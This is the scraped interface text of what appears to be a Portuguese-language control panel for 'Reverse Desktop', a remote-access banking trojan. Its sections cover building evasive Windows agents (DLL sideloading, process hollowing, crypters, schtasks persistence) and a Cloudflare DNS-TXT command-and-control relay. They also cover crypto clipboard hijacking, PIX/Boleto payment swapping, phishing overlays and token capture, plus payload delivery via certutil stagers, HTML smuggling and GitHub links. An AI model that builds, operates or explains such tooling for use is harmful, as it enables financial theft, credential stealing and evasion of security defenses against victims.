⚠️
Confirmar
âš¡ Terminal Remoto
📁 File Manager
Carregando...
🎨 Editor de Overlay
Carregue ou edite a imagem

Reverse Desktop

Painel de Controle

Reverse Desktop

Reverse Desktop

Painel de Controle

👤
🔒
Bloqueado por 00:00
Reverse Desktop
Reverse Desktop build 1.0
reverse / início Início
0presentes
0fora
0frota
Central
⌂Início
Agentes
☰Logs â—‰Conectados 0
Ferramentas
▦Telas ◇Wallet
Pacotes
⚒Build ⬇Payloads ▣SFX ◻Inno Setup ↗Delivery 🔗Gerador de Link
Sistema
⚙Settings
👤
admin operador
Agora
0
presentes

0 em atividade

0 frota 0 no inventário
0 fora 0 indisponíveis
0 em foco 0 sob atenção

Últimos acessos

0
Nenhuma entrada recente

Sistemas

—

Defesas

—

Mapa

—

Operadores

0
Carregando...
Fila
0
sinais ativos

aguardando eventos

0 visitas
0 rastros limpos
0 enlaces
Fila vazia — nenhum evento ainda
Frota
0
presentes

0 presentes / 0 fora

0 no inventário
0 fora
0 em foco
📋 Auto Clipboard Replacer
🪙 Criptomoedas
💳 Pagamentos BR
Saldo das carteiras configuradas
Configure endereços na aba "Configurar Swap" e clique em Atualizar Saldos
Tesouraria
Wallet

saldos · movimentações · trocas

0ativos
—enlace
0trocas
Ao vivo · próx. em 60s
Configure endereços em Conectados → Clip swap e sincronize os saldos

Trocas PIX / Boleto

0
Ao vivo
Nenhuma troca registrada ainda
Biblioteca
Telas

overlays · espera · recortes

0overlays
0espera
0recortes
Catálogo TNT · Espera · RC
Editor Selecione uma tela
Nenhuma tela aberta
escolha um item no catálogo

Campos de entrada

Botão OK

Após OK → espera

Envia a espera automaticamente após o OK

Área QR

Área do recorte

Área QR

Sistema
Settings

identidade · enlace · operadores

—enlace
—papel
0seções
▸ Identidade

Ícone, banner e título usados no login, topbar e overlay de sessão. Alterações aplicam na hora.

Ícone Login, topbar, overlay e favicon
Painel esquerdo do login
▸ Enlace
Enlace
Endereço-
Estado-
Build
Versão0.1.0
Build240915
▸ Cloudflare DNS

Dois subdomínios separados (você define os nomes): Relay/C2 (ex. connect) e Build API (ex. api) para SFX / hook / payload. Ambos A records ficam proxied. O TXT criptografado usa só o domínio do relay.

Crie em: Cloudflare → My Profile → API Tokens → Create Token → Edit zone DNS (Template)
Encontra em: Cloudflare → seu site → Overview → lado direito → Zone ID
Apex da zone — ex. viewerupdates-ai.online
Proxied · usado no TXT / dnscrypt
Proxied · só este vira BUILD_PUBLIC_URL
🔐 TXT C2 (dnscrypt) — automático

Gera o blob, publica em /api/dns-txt (via domínio Build API) e preenche Build → URL1. Não precisa colar em lugar nenhum.

▸ Telegram

Receba alerta no Telegram quando um sinal entrar em Logs.

Crie um bot com o @BotFather no Telegram e copie o token aqui.
Use @userinfobot ou @getidsbot para descobrir seu chat ID. Pode ser um grupo (negativo).
▸ Notificações desktop

Popup nativo do Windows (Central de Ações) e do navegador. O toast da página continua aparecendo. Em HTTP o Windows bloqueia o popup — use HTTPS.

▸ Sites monitorados

Cadastro de sites para detecção (URL e/ou título). A limpeza automática fica em Rastro limpo auto.

Nome Padrões Detectar Processo ID Ações
▸ Rastro limpo auto
Site Padrões Ações
▸ Banimentos

AUTO-BAN (identificação :8880) e HTTP-BAN (rate limit :8081). O relay guarda o ban em memória — desbanir reinicia o container e limpa todos os IPs. Agentes reconectam sozinhos.

IP Tipo Motivo Desde Expira Ação
▸ Operadores
Usuário Role Owner Clientes Criado por Ações

📌 Atribuir Cliente a Operador

▸ Visão por operador

Cada operador pode ter sua própria conexão (Worker/domínio) independente. Aqui você vê o status de todos.

Usuário Role Worker Domínio Online Total

Build

Geração remota do agente Windows (x64 / x86)

⚙️ Parâmetros
Modelo de build

V2: ZIP = Host+DLL. V3–V7: payload puro (sem host sideload).

Opções da stub (V3–V7)

Desmarcado = cliente completo. Marcado = núcleo leve (só conexão / heartbeat / detecção).

V3 — EXE

Memory: ZIP com EXE + .ps1 + .dat (mesma pasta). EXE só inicia o PowerShell; PE nunca em claro.

V5 — PDF
V6 — BIN
V7 — Imagem
V4 — drop / encoding

Memory: PE só em RAM (hollow). Drop abaixo só vale se mudar o método de execução.

Crypter / Anti-detecção

Ofusca o VBS e varia decode/execução para reduzir assinaturas estáticas.

Processo legítimo usado no hollow (testado: notepad.exe).

Alvo DLL: TEXT_XOR criptografa só a sideload (.text) Host.exe: nunca criptografado por essas opções Assinatura: muda hash/strings na DLL — não é crypto
Arquivos do ZIP (abertura) Obrigatório Host.exe + DLL Sem persistência

Par que vai no ZIP e que você abre primeiro. Independente de persistência — funciona sozinho.

ZIP = Host.exe + DLL apenas. Sem persistência marcada, é só isso (mais hook embutido se escolher abaixo).

Camuflagem HTML (isca) Opcional Só abertura ZIP

Dispara na thread principal só na abertura via isca (ZIP). Não abre no boot da persistência (schtasks).

Hollow Execution (teste) Opcional Lab/VM

Cria o processo suspenso, injeta o payload e redireciona a execução. CREATE NO WINDOW usa a flag Win32 no CreateProcess (sem janela de console).

Persistência ONLOGON Opcional Host.exe + DLL próprios

Desligado: só o ZIP de abertura. Ligue para configurar um outro Host.exe + DLL (não é o do ZIP).

Par da persistência — separado do ZIP. Instalador reflective dropa estes arquivos e cria ONLOGON.

ZIP continua com o par de abertura. Persistência embute seu Host+DLL e dropa na pasta + schtasks. Nomes podem ser diferentes do ZIP.

Hook / input remoto Alvo: memória (hook) Não criptografa Host/DLL

Não criptografa Host.exe nem a DLL. Só carrega hook em RAM no Assumir controle.

Stager (download em RAM) DLL abertura off

Somente baixar exige Hollow ativo + BUILD_PUBLIC_URL (domínio CF). Bin Mode exige Stager + Hollow e publica payload.bin XOR (auto). URL estável /api/payload/<id>.

Assinatura / polimorfismo Alvo: DLL (hash/strings) Host.exe intocado · não criptografa

Nenhuma opção abaixo criptografa o Host.exe nem a seção de código. Só mudam fingerprint da DLL / build.

Alvo: DLL (handshake/strings) Não criptografa Host.exe Não criptografa .text
Alvo: DLL (junk no código-fonte) Não criptografa Host.exe Não criptografa arquivo
Alvo: DLL (+ PEs do build) Só adiciona bytes no fim Não criptografa Host.exe / .text
Alvo: strings ofuscadas na DLL Não criptografa Host.exe Não é TEXT_XOR
Criptografia do código ÚNICA criptografia de arquivo
O que é criptografado
SIM — DLL sideload seção .text (código) + stub de decrypt · OXM1 v2 (chave 16 bytes)
NÃO — Host.exe o executável do ZIP/persistência não passa por TEXT_XOR
NÃO — hook.dll solto hook vai embutido; não é arquivo criptografado no ZIP

Chave = 32 chars hex (16 bytes). Stride desligado = TEXT_XOR sem inflar o arquivo. Stride ligado (ex. 8) = .rsrc bem maior. Host.exe sempre em claro.

Avançado Extras Não criptografa

ZIP base continua Host + DLL. Extras só acrescentam debug. HostExitGuard padrão segura o host uns segundos. Forte = mais detecção; use só se o host ainda morrer rápido.

Opções (legado)

Legado: regenera tabelas de strings. No V2 fica no card Assinatura.

⬇ Baixar ZIP

          
🔍 DLL Dependency Analyzer

Análise hard: IAT + delay + strings + manifest embutido. Para DLLs que só existem na pasta (e o EXE carrega sem estar no IAT), selecione também a pasta original do host.


          
🗂 Histórico de builds (hash → chave)
Quando Job XOR SEED Task ZIP hash
Carregue o histórico...
📋 Log do build
Aguardando...
🔐 Helper relay.txt

Encripta host:porta para o conteúdo do TXT/JS remoto (não altera o EXE).

SFX
Empacota arquivos em um .exe auto-extraível (7-Zip SFX) — silencioso, path e run pós-extração
📦 Criar SFX

WinRAR e 7-Zip fazem Path + Silent + Setup. Aqui usamos 7-Zip SFX no servidor. Envie quantos arquivos quiser (qualquer formato). O .exe extrai no destino e pode rodar um deles.

Host + DLLs (incluindo a de sideload) ficam no SFX. Após extrair, o config roda o Host direto (RunProgram).

Metadados PE — rcedit + UPX no stub
⬇ Baixar .zip
Aguardando...
Inno Setup
Gera instalador Windows (.exe) via Inno Setup + Wine/ISCC no servidor — path, silent, sideload e metadados PE
📦 Criar Installer

Envie os arquivos do pacote (host, DLLs, etc.). O ISCC compila um setup.exe com path de instalação, modo silencioso e execução pós-instalação. Sideload DLL é staged na VPS como no SFX.

Metadados PE (opcional) — aplicados no setup.exe via rcedit
⬇ Baixar .zip
Aguardando...

Delivery Manager

Stager BAT (certutil), HTML smuggling e redirectors para entrega de payloads.

Stager BAT

Gera .bat que baixa uma origem e executa. Escolha só um tipo de fonte.

HTML Smuggling

Gera página HTML com o binário embutido (base64). Escolha só uma fonte.

Redirectors

URLs intermediárias para redirecionar downloads.

Payload Manager

URLs e arquivos servidos em /api/payload/<id> para DLLs stager.

Usa o ID do campo acima (cria se não existir).
IDNomeArchDestinoLink
Carregando...

Gerador de Link

Upload para GitHub Releases / Contents e gera URL direta de download.

1) Crie um PAT em GitHub → Settings → Developer settings → Personal access tokens (classic: escopo repo, ou fine-grained: Contents Read and write no repo). 2) Cole abaixo e clique Conectar — detectamos usuário e listamos repos. 3) Escolha o repo e faça upload.

Preferível repo público para o link abrir sem login. Owner/repo são preenchidos automaticamente.

Upload

Público: aparece em Releases. Não listado: caminho oculto no repo (não sai em Releases; link direto funciona; ~95 MB max).


            
- 🔒 OVERLAY 🎯 TNT ✂️ RECORTE
🧠 - --ms 🖼 0 frames ↓ 0 KB 00:00:00 ● Hook - 0 FPS -
Sem enlace
sinal do ponto interrompido
Reverse Desktop
Sessão

Preparando ponto

Inicializando captura…

1enlace 2autenticação 3captação 4fluxo

Controles ações do ponto ativo
Espera ▸
Resgates ▸
Utilitários ▸
Tokens ▸
Captação ▸
Estação ▸
Coleta ▸
Rede ▸
Social ▸
Atalhos ▸
EscVoltar ao Início
FTela cheia
HOcultar painel
RSincronizar frota
MÁudio on/off
Fit

MÓDULOS

Nenhum módulo detectado

COLAR TEXTO NO AGENTE

âš¡ RESPOSTAS DO CLIENTE

Aguardando...

📝 NOTAS DO CLIENTE

INFORMAÇÕES

PC:-
Casa:-
IP:-
Sistema:-
Memória:-